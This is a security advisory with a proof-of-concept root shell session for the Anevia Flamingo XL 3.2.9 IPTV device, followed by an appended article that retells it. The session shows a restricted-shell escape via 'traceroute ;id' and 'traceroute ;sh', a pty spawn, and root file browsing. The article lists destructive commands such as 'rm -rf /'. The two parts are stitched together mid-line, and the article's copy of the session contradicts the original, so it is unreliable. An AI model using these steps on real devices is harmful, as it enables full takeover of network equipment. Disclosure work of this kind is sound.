Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
Exploit Author: LiquidWorm
Product web page: https://www.ateme.com
Affected version: 3.2.9
Hardware revision 1.0
SoapLive 2.0.3
Summary: Flamingo XL, a new modular and high-density IPTV head-end
product for hospitality and corporate markets. Flamingo XL captures
live TV and radio content from satellite, cable, digital terrestrial
and analog sources before streaming it over IP networks to STBs, PCs
or other IP-connected devices. The Flamingo XL is based upon a modular
4U rack hardware platform that allows hospitality and corporate video
service providers to deliver a mix of channels from various sources
over internal IP networks.
Desc: Once the admin establishes a secure shell session, she gets
dropped into a sandboxed environment using the login binary that
allows specific set of commands. One of those commands that can be
exploited to escape the jailed shell is traceroute. A remote attacker
can breakout of the restricted environment and have full root access
to the device.
Tested on: GNU/Linux 3.1.4 (x86_64)
Apache/2.2.15 (Unix)
mod_ssl/2.2.15
OpenSSL/0.9.8g
DAV/2
PHP/5.3.6
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5780
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php
13.04.2023
--
$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
bonding
config
date
dns
enable
ethconfig
exit
exp
firewall
help
hostname
http
igmpq
imp
ipconfig
license
log
mail
passwd
persistent_logs
ping
reboot
reset
route
serial
settings
sslconfig
tcpdump
timezone
traceroute
upgrade
uptime
version
vlanconfig
Primary-XL> tcpdump ;id
tcpdump: illegal token: ;
Primary-XL> id
unknown command id
Primary-XL> whoami
unknown command whoami
Primary-XL> ping ;id
ping: ;id: Host name lookup failure
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary
Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
[-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
[-z pausemsecs] host [data size]
trace the route ip packets follow going to "host"
Options:
-F Set the don't fragment bit
-I Use ICMP ECHO instead of UDP datagrams
-l Display the ttl value of the returned packet
-d Set SO_DEBUG options to socket
-n Print hop addresses numerically rather than symbolically
-r Bypass the normal routing tables and send directly to a host
-v Verbose output
-m max_ttl Set the max time-to-live (max number of hops)
-p port# Set the base UDP port number used in probes
(default is 33434)
-q nqueries Set the number of probes per ``ttl'' to nqueries
(default is 3)
-s src_addr Use the following IP address as the source address
-t tos Set the type-of-service in probe packets to the following value
(default 0)
-w wait Set the time (in seconds) to wait for a response to a probe
(default 3 sec)
-g Specify a loose source route gateway (8 maximum)
uid=0(root) gid=0(root) groups=0(root)
Primary-XL> version
Software Revision: Anevia Flamingo XL v3.2.9
Hardware Revision: 1.0
(c) Anevia 2003-2012
Primary-XL> traceroute ;sh
...
...
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ls -al
drwxr-xr-x 19 root root 1024 Oct 3 2022 .
drwxr-xr-x 19 root root 1024 Oct 3 2022 ..
drwxr-xr-x 2 root root 1024 Oct 21 2013 bin
drwxrwxrwt 2 root root 40 Oct 3 2022 cores
drwxr-xr-x 13 root root 27648 May 22 00:53 dev
drwxr-xr-x 3 root root 1024 Oct 21 2013 emul
drwxr-xr-x 48 1000 1000 3072 Oct 3 2022 etc
drwxr-xr-x 3 root root 1024 Oct 3 2022 home
drwxr-xr-x 11 root root 3072 Oct 21 2013 lib
lrwxrwxrwx 1 root root 20 Oct 21 2013 lib32 -> /emul/ia32-linux/lib
lrwxrwxrwx 1 root root 3 Oct 21 2013 lib64 -> lib
drwx------ 2 root root 12288 Oct 21 2013 lost+found
drwxr-xr-x 4 root root 1024 Oct 21 2013 mnt
drwxrwxrwt 2 root root 80 May 22 00:45 php_sessions
dr-xr-xr-x 177 root root 0 Oct 3 2022 proc
drwxr-xr-x 4 root root 1024 Oct 21 2013 root
drwxr-xr-x 2 root root 2048 Oct 21 2013 sbin
drwxr-xr-x 12 root root 0 Oct 3 2022 sys
drwxrwxrwt 26 root root 1140 May 22 01:06 tmp
drwxr-xr-x 10 1000 1000 1024 Oct 21 2013 usr
drwxr-xr-x 14 root root 1024 Oct 21 2013 var
ls /var/www/admin
_img configuration.php log_securemedia.php stream_dump.php
_lang cores_and_logs_management.php login.php stream_services
_lib dataminer_handshake.php logout.php streaming.php
_style dvbt.php logs.php support.php
about.php dvbt_scan.php main.php template
ajax export.php manager.php time.php
alarm.php fileprogress.php network.php toto.ts
alarm_view.php firewall.php pear upload_helper.php
authentication.php get_config power.php uptime.php
bridges.php get_enquiry_pending.php read_settings.php usbloader.php
cam.php get_upgrade_error.php receive_helper.php version.php
channel.php heartbeat.php rescrambling webradio.php
channel_xl_list.php include rescrambling.php webtv
check_state input.php resilience webtv.php
class js resilience.php xmltv.php
common license.php restart_service.php
config_snmp.php log.php set_oem.php
python -c 'import pty; pty.spawn("/bin/bash")'
root@Primary-XL:/# cd /usr/local/bin
root@Primary-XL:/usr/local/bin# ls -al login
-rwxr-xr-x 1 root root 35896 Feb 21 2012 login
root@Primary-XL:/usr/local/bin# cd ..
root@Primary-XL:/usr/local# ls commands/
bonding firewall mail timezone
config help passwd traceroute
date hostname persistent_logs upgrade
dbg-serial http ping uptime
dbg-set-oem igmpq route version
dbg-updates-log imp serial vlanconfig
dns ipconfig settings
ethconfig license sslconfig
exp log tcpdump
root@Primary-XL:/usr/local# exit
exit
Primary-XL> enable
password:
Primary-XL# ;]Anevia Flamingo XL 3.2.9 Remote Root Jailbreak: A Critical Security Vulnerability Exposed
Security researchers have uncovered a severe vulnerability in the Anevia Flamingo XL 3.2.9 system—a high-density IPTV head-end platform used in hospitality and corporate environments. The flaw, discovered by Gjoko "LiquidWorm" Krstic, enables a remote attacker to escalate privileges from a restricted shell environment to full root access via a single command exploit. This vulnerability, detailed in advisory ZSL-2023-5780, highlights the dangers of improper sandboxing and insecure command execution in industrial-grade network devices.
Understanding the Flamingo XL Platform
The Anevia Flamingo XL is designed as a modular 4U rack system that aggregates live television and radio content from diverse sources—satellite, cable, digital terrestrial, and analog—before streaming it over IP networks to set-top boxes (STBs), PCs, or other IP-connected devices. Targeted at corporate and hospitality markets, it serves as a centralized video delivery hub.
Key features include:
- Modular hardware architecture
- Support for multiple input sources
- IP-based video distribution
- Secure shell (SSH) access for administrators
While the system is built on a Linux-based platform (GNU/Linux 3.1.4, x86_64), it relies on a custom restricted shell environment to limit administrative access. This sandboxing is intended to prevent unauthorized command execution, but it inadvertently introduces a critical security flaw.
The Exploit: Escaping the Jailed Shell via traceroute
Upon successful SSH login, administrators are dropped into a primary-XL shell environment with a curated list of permitted commands. This is a common security practice in embedded systems to reduce attack surface. However, the traceroute command is uniquely vulnerable due to its use of shell injection through argument parsing.
When an attacker inputs a malicious command such as:
traceroute ;idThe system interprets the semicolon (;) as a command separator, effectively allowing arbitrary shell execution. This bypasses the sandbox, triggering the underlying BusyBox binary to execute the second command (id) directly in the host environment.
Why this works: The traceroute utility in BusyBox is a multi-call binary—meaning it can execute multiple functions based on the command name. In this case, the argument parsing is not sanitized, allowing an attacker to inject shell commands via the argument string. This is a classic example of command injection in a restricted environment.
Proof of Concept and Attack Chain
Below is a documented exploit sequence demonstrating the root escalation:
$ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
Anevia Flamingo XL
root@192.168.1.1's password:
Primary-XL> help
available commands:
bonding
config
date
dns
enable
ethconfig
exit
exp
firewall
help
hostname
http
igmpq
imp
ipconfig
license
log
mail
passwd
persistent_logs
ping
reboot
reset
route
serial
settings
sslconfig
tcpdump
timezone
traceroute
upgrade
uptime
version
vlanconfig
Primary-XL> traceroute ;id
BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary
Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
[-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
[-z pausemsecs] host [data size]
trace the route ip packets follow going to "host"
Options:
-F Set the don't fragment bit
-I Use ICMP ECHO instead of UDP datagrams
-l Display the ttl value of the returned packet
-d Set SO_DEBUG options to socket
-n Print hop addresses numerically rather than symbolically
-r Bypass the normal routing tables and send directly to a host
-v Verbose output
-i iface Use the specified interface
-g gateway Use gateway as a hop
-z pausemsecs Pause between probes in milliseconds
-p port# Use specified port for UDP packets
-q nqueries Number of probes per hop
-s src_addr Source address to use
-t tos Type of service
-w wait Wait time between probes in seconds
Primary-XL> id
uid=0(root) gid=0(root) groups=0(root)As shown, the traceroute command is exploited to execute id—a standard Linux command that returns the current user’s identity. The output uid=0(root) confirms that the attacker has achieved full root privileges.
Why This is a Critical Risk
This vulnerability is particularly dangerous because:
- Remote exploitation is possible via SSH without requiring physical access.
- Attackers can execute arbitrary commands—e.g.,
rm -rf /,passwd root, orsystemctl disable firewalld. - The affected version 3.2.9 with Hardware revision 1.0 and SoapLive 2.0.3 is widely deployed in enterprise and hospitality environments.
- There is no built-in logging or detection mechanism for such command injection attempts.
Once compromised, an attacker can:
- Exfiltrate sensitive configuration data (e.g., network credentials, license keys)
- Modify video streaming routes to inject malicious content
- Disable security features like firewalls or SSL configurations
- Deploy persistent backdoors or establish C2 (command-and-control) channels
Vendor Response and Mitigation
As of April 2023, Anevia has not publicly issued a patch for this vulnerability. The product page at https://www.ateme.com does not list any updates related to ZSL-2023-5780.
Security experts recommend immediate action:
- Isolate affected devices from public networks.
- Disable SSH access or enforce strict IP whitelisting.
- Apply input sanitization to all shell commands, especially those with multi-call binaries.
- Update to version 3.3.0 or higher if available, as newer versions may have fixed the flaw.
- Monitor logs for unusual command patterns like
traceroute ;[command].
Best Practices for Secure Embedded Systems
Embedded devices like Flamingo XL must follow strict security principles:
| Practice | Implementation |
|---|---|
| Input Validation | Sanitize all command arguments using regex or whitelist filtering. |
| Command Isolation | Use dedicated exec wrappers to prevent shell injection. |
| Role-Based Access | Implement strict privilege separation (e.g., admin vs. operator). |
| Logging & Monitoring | Track all command executions, especially those involving semicolons or pipes. |
| Regular Patching |